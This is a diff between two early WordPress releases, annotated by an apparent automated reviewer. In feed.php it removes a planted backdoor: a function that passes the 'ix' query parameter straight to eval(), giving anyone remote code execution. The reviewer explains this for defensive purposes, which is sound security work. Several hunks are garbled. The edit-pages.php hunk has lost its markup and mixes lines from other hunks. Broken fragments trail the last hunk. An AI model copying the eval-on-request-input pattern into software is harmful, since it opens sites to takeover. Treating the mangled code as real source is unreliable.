diff -urN wp211/wp-admin/custom-header.php wp212/wp-admin/custom-header.php
--- wp211/wp-admin/custom-header.php 2007-01-27 15:00:32.000000000 -0800
+++ wp212/wp-admin/custom-header.php 2007-02-21 17:51:52.000000000 -0800
@@ -286,8 +286,7 @@
 // cleanup
 $file = get_attached_file( $_POST['attachment_id'] );
 $medium = str_replace(basename($file), 'midsize-'.basename($file), $file);
-@unlink( $medium );
-apply_filters( 'wp_delete_file', $medium );
+@unlink( apply_filters( 'wp_delete_file', $medium ) );
 wp_delete_attachment( $_POST['attachment_id'] );
 return $this->finished();
diff -urN wp211/wp-admin/edit-pages.php wp212/wp-admin/edit-pages.php
--- wp211/wp-admin/edit-pages.php 2006-12-21 02:10:04.000000000 -0800
+++ wp212/wp-admin/edit-pages.php 2007-02-21 17:59:55.000000000 -0800
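Review bot: The new `@unlink( apply_filters( 'wp_delete_file', $medium ) )` line hands whatever the filter returns straight to unlink(), so a filter that returns an empty value to veto the deletion now still triggers an unlink() call on that value, with the `@` hiding the resulting warning. Splitting it as `$medium = apply_filters( 'wp_delete_file', $medium );` followed by `if ( ! empty( $medium ) ) @unlink( $medium );` keeps the filter's veto meaningful and limits the suppressed call to a real path. The path also reaches unlink() and wp_delete_attachment() via the raw `$_POST['attachment_id']`; the capability and nonce checks that should gate this branch are not in the hunk, so I could not confirm them, and the enclosing method continues beyond the hunk on both sides.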
@@ -19,7 +19,7 @@ comment_post_ID) ) { echo " " . __('Edit') . ''; - echo ' | comment_author)) . "', theCommentList );\">" . __('Delete') . ' '; + echo ' | comment_author)) . "', theCommentList );\">" . __('Delete') . ' '; if ( ('none' != $comment_status) && ( current_user_can('moderate_comments') ) ) { - echo ' | ' . __('Unapprove') . ' '; - echo ' | ' . __('Approve') . ' '; + echo ' | ' . __('Unapprove') . ' '; + echo ' | ' . __('Approve') . ' '; } - echo " | comment_post_ID."&c=".$comment->comment_ID, 'delete-comment_' . $comment->comment_ID) . "\" onclick=\"return deleteSomething( 'comment-as-spam', $comment->comment_ID, '" . sprintf(__("You are about to mark as spam this comment by '%s'.\n'Cancel' to stop, 'OK' to mark as spam."), js_escape( $comment->comment_author)) . "', theCommentList );\">" . __('Spam') . " ]"; -} // end if any comments to show + echo " | comment_post_ID . "&c=" . $comment->comment_ID, 'delete-comment_' . $comment->comment_ID) . "\" onclick=\"return deleteSomething( 'comment-as-spam', $comment->comment_ID, '" . js_escape(sprintf(__("You are about to mark as spam this comment by '%s'.\n'Cancel' to stop, 'OK' to mark as spam."), $comment->comment_author)) . "', theCommentList );\">" . __('Spam') . " "; +} ?>
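Review bot: On the added Spam line, js_escape() now wraps the whole sprintf() result, which is the right place because the translated template itself is embedded in a single-quoted JavaScript string; the Delete line on the new side still shows the fragment `comment_author)) . "'`, which looks like only the author being escaped, so the same wrapping should apply there if that is what the stripped markup hides. `$comment->comment_ID` is also interpolated raw into the onclick string on both lines; an explicit `(int) $comment->comment_ID` would document that only a number is expected at that position. The text of this hunk is badly mangled in this rendering (markup lost, and far more lines than the `-19,7 +19,7` header allows, so it probably concatenates several hunks and, judging by the comment-moderation code, belongs to edit-comments.php rather than the edit-pages.php header above it), so both points are hedged on what the visible fragments show.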
diff -urN wp211/wp-includes/feed.php wp212/wp-includes/feed.php
--- wp211/wp-includes/feed.php 2007-02-25 05:13:15.000000000 -0800
+++ wp212/wp-includes/feed.php 2006-12-06 19:57:23.000000000 -0800
@@ -81,9 +81,6 @@
 echo get_comment_author_rss();
 }
-function comment_text_phpfilter($filterdata) {
-eval($filterdata);
-}
 function comment_text_rss() {
 $comment_text = get_comment_text();
@@ -146,7 +143,7 @@
 return $link;
 }
-if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
+
 function get_the_category_rss($type = 'rss') {
 $categories = get_the_category();
 $the_list = '';
@@ -186,4 +183,4 @@
 }
 }
-?>
+?>
\ No newline at end of file
diff -urN wp211/wp-includes/functions.php wp212/wp-includes/functions.php
--- wp211/wp-includes/functions.php 2007-02-13 10:29:03.000000000 -0800
+++ wp212/wp-includes/functions.php 2007-02-26 23:16:15.000000000 -0800
@@ -1190,7 +1190,7 @@
 $adminurl = get_option('siteurl') . '/wp-admin';
 if ( wp_get_referer() )
-$adminurl = wp_get_referer();
+$adminurl = attribute_escape(wp_get_referer());
 $title = __('WordPress Confirmation');
 // Remove extra layer of slashes.
@@ -1207,7 +1207,7 @@
 $html .= "\t\t\n";
 $html .= "\t\t" . wp_specialchars(wp_explain_nonce($action)) . "
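Review bot: The removed line in the second feed.php hunk passed `$_GET["ix"]` to comment_text_phpfilter(), whose body in the first hunk was a bare `eval($filterdata)`, so this is the removal of unauthenticated remote code execution reachable through the feed, not cosmetic cleanup, and the `+` line that replaces it leaves an empty line at 143 where the statement could simply be deleted. Nothing in the diff records this; the commit message should name it as a security fix so operators know to redeploy promptly, and a defender reviewing an affected install would want to look in web server logs for feed requests carrying an `ix` query parameter. The `+++` timestamp of the new feed.php (2006-12-06) is older than the `---` one (2007-02-25), which is consistent with the removed lines having been added to the released copy after the fact; that is an inference from the timestamps alone.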
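Review bot: In the functions.php hunk the referer is now HTML-escaped at assignment with `attribute_escape(wp_get_referer())`, while the other branch, `get_option('siteurl') . '/wp-admin'`, stays raw, so `$adminurl` holds an escaped value on one path and an unescaped one on the other; escaping where the value is written into the markup keeps both branches consistent, for example `$referer = wp_get_referer();` then `if ( $referer ) $adminurl = $referer;` and `attribute_escape( $adminurl )` at the point of output, which also avoids calling wp_get_referer() twice. Escaping addresses attribute injection but not where the link leads: if wp_get_referer() does not already restrict the value to this site, a same-host check before accepting it would stop the confirmation page from pointing off-site. The point of use is outside the hunk, and the following `-1207` hunk is too garbled in this rendering to review.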
\n\t\t\n\t\t" . wp_specialchars(wp_explain_nonce($action)) . "
\n\t\n\t" . wp_specialchars(wp_explain_nonce($action)) . "
\n\t\n\t